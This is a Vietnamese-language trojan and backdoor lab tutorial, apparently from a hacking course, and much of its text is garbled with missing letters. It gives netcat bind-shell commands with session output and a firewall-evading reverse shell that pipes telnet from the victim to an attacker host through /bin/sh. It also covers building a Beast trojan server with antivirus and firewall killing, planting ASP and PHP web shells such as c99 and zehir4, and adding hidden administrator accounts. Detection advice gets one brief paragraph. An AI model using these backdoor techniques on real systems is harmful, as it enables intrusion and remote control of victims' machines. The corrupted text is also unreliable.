Gi i thi uv Trojan và Backdoor:

Trojan và Backdoor đ c s d ng giám sát máy n n nhân, và là c a sau đ Hacker có th

vào l i h thông máy tính thông qua công k t n i(port), thông qua môi tr ng Web(webase).

Lo i s d ng c ng k t n i ta th ng th y là netcat, beast, Donald Dick v.v. Và lo i s d ng

môi tr ng Webbase thông th ng là r57,c99, zehir4v.v. c tính c a Trojan k t n i port là

m i l n k t n i ph i m c ng, và admin t ng đ i phát hi n d dàng h n so v i lo i

Webbase(thông th ng đ t n công Web Server). Trong bài th c hành, chúng ta cài th các

tính n ng c a netcat, beast, c99, zehir4 và phân tích 1 do n code m u trojan.

II/ Các bài th c hành: Bài 1 S d ng netcat:

1/S d ng netcat đ k t n i shell

Trên máy tính c a n n nhân, b n kh i đ ng netcat vào ch đ l ng nghe, dùng tùy ch n –l

(listen) và -p port đ xác đnh s hi u c ng c n l ng nghe, -e <tên_ch ng_trình_c n_ch y>

đ yêu c u netcat thi hành 1 ch ng trình khi có 1 k t n i đ n, th ng là shell l nh cmd.exe

(đ i v i NT) ho c bin/sh (đ i v i Unix).

E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error

- trên máy tính dùng đ t n công, b n ch vi c dùng netcat n i đ n máy n n

nhân trên c ng đã đnh, ch ng h n nh 8080

C:\>nc -nvv 172.16.84.2 8080

(UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp. E:\>cd test

cd test E:\test>dir /w dir /w

Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test

[.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe

C:\test>exit exit

sent 20, rcvd 450: NOTSOCK

Bây gi chúng ta đã có đ c shell và ki m soat đ c máy n n nhân.Tuy nhiên, sau k t n i

trên, netcat trên máy n n nhân c ngđóng luôn. yêu c u netcat l ng nghe tr l i sau m i k t

n i, b n dùng -L thaycho -l. L u ý: -L ch có th áp d ng cho b n Netcat for Windows, không áp d ng cho b n ch y trên Linux.

2/S d ng netcat đ k t n i shell ngh ch chuy n đ by pass Firewall:

- dùng telnet đ n i c a s netcat đang l ng nghe, k đó đ a l nh t c a s này vào lu ng

telnet ngh ch chuy n, và g i k t qu vào c a s kia. Ví d : (adsbygoogle = window.adsbygoogle || []).push({});

- trên máy dùng đ t n công(172.16.84.1), m 2 c a s netcat l n l t l ng nghe trên c ng 80

và 25:

+ c a s Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 ...

connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055 pwd ls -la _ + c a s Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 ...

connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056 /

total 171

drwxr-xr-x 17 root root 4096 Feb 5 16:15 . drwxr-xr-x 17 root root 4096 Feb 5 16:15 .. drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (²?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (²?b drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? drwx--- 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (²?n

drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var

- trên máy tính n n nhân(172.16.84.2), telnet ngh ch chuy n đ n máy dùng đ

t n công(172.16.84.1), dùng /bin/sh đ k t xu t:

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 /bin/sh: Trying: command not found

/bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 172.16.84.1...

Connected to 172.16.84.1. Escape character is '^]'. _

Telnet trên máy n n nhân s chuy n t t c nh ng gì mà chúng ta gõ vào trong c a s Netcat (1) - c ng 80 k t xu t sang cho /bin/sh thi hành. K t qu c a

/bin/sh đ c k t xu t tr l i cho máy tính dùng đ t n công trên c a s Netcat

(2) - c ng 25. Nhi m v c a b n là ch c n gõ l nh vào c a s Netcat (1) và xem k t qu trong c a s Netcat (2).

S d tôi ch n c ng 80 và 25 vì các c ng này th ng không b firewalls ho c

filters l c.

Bài 2: S d ng Trojan Beast và detect trojan.

Mu n s d ng Trojan Beast, ta c n ph i xây d ng 1 file Server cài lên máy n n nhân,

sau đó file server này s l ng nghe nh ng port c đnh và t máy t n công ta s connect vào

máy n n nhân thông qua c ng này.

Ch n trojan Beast trong đa CD và ch y file t o trojan.

Ta có th s d ng thêm các tính n ng nh AV-FW kill đ t Firewall trên máy đ i

ph ng, ho c inject vào 1 file khác nh notepad.exe, explore d i d ng dll. Ta s d ng

button Save Server đ t i ra file server.exe và ch y file máy n n nhân và ki m tra trên

Bây gi ta s d ng ch ng trình t i máy t n công đ connect vào file Server đã ch y trên máy c a n n nhân.

Ta th s d ng 1 s tính n ng nh là managers file đ download các file mình c n t i

máy n n nhân, hay b n có shutdown, reboot máy n n nhân thông qua tính n ng c a tag “Windows”

Cách phòng ch ng: Ngoài cách s d ng các ch ng trình Anti Virus và Trojan, ta có th (adsbygoogle = window.adsbygoogle || []).push({});

d a và tính ch t thông th ng nh ng Trojan này b t bu c ph i m port nào đó ra ngoài, ta có

D a vào thông tin Currport cung c p ta có th xóa đ ng d n c a file cehclass.exe và xóa nh ng thông tin v nó trong regedit, và startup v.v.

Bài 3: S d ng Trojan d i d ng Webbase

Trojan d ng webbase thông th ng ph bi n h n trong môi tr ng web, sau khi

hacker khai thác đ c l h ng và chi m quy n s d ng Web Server, hacker s đ l i trojan

d i d ng Webbase và thông qua Trojan này hacker có th ra vào h th ng cho nh ng l n sau.

c đi m c a lo i Trojan này là r t khó phát hi n, vì no ch y d i d ng Web và s d ng

nh ng hàm truy su t h th ng thông qua các ngôn ng asp, phpv.v, vì v y nó không th d phát hi n nh lo i trojan k t n i nh netcat, beast v.v.

th c hi n bài lab này tr c tiên ta ph i cài đ t Web Server g m IIS và Apache.

1/Trojan d i d ng Web v i ngôn ng ASP: Ta s d ng Web Server IIS v i

Trojan đ c vi t b ng ngôn ng này, ng i vi t gi i thi u v i các b n 2 trojan tiêu bi u là

cmd.asp và zehir4.asp

u tiên b n cài đ t d ch v Web IIS(vi c cài đ t khá đ n gi n, h c viên có th t

Ta đánh vào l nh Dir đ xem thông tin các file trong h th ng, v i trojan nh trên ta

có th xem đ c các thông tin h th ng, có th upload,download thông qua tftp, và add user

vào h th ng ví d l nh “ net user hao hao /add”, “net Localgroup administrators hao /add “.

Vào link http://192.168.1.116/zehir4.asp đ xem v trojan webbase th 2.

Ta th y Trojan này h ng đ h a và ti n d ng h n, vi c l y file,xóa file hoàn toàn

thông qua web, chúng ta có th d dàng thao tác trên máy c a n n nhân.

2/Trojan v i ngôn ng PHP: Ta s d ng Web server Apache v i trojan đ c vi t b ng

ngôn ng này, ng i vi t gi i thi u đ n các b n trojan tiêu bi u là c99.

u tiên b n s d ng ch ng trình phpeasy đ cài k t h p 3 gói sau apache, php, và

mysql. Tuy nhiên trong bài các b n ch c n s d ng php và apache. Chép các file trojan và th

ây là file trojan r t nguy hi m, nó v a có th download, upload file, đ ng th i h tr

chúng ta ch y nh ng úng d ng nh perl, th c thi các hàm h th ng, cung c p thông tin v n n

nhân hi n hànhv.v. Do tính ch t nh v y cho nên Trojan này đ c hacker dùng r t r ng